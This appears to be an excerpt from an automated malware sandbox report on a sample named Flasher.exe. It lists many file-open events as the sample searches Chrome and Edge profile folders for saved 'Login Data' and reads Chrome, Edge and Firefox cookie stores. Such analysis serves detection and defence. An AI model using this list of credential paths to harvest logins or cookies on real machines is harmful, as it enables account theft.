Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340886963547611\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SharedStorage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\InterestGroups-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340886879273065\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\MANIFEST-000001\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENT\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000001\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredApps\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_3\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENT\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340886879173047\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\CURRENT\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\InterestGroups\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_2\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\index\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340886963423997\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK\Login Data	Jump to behavior
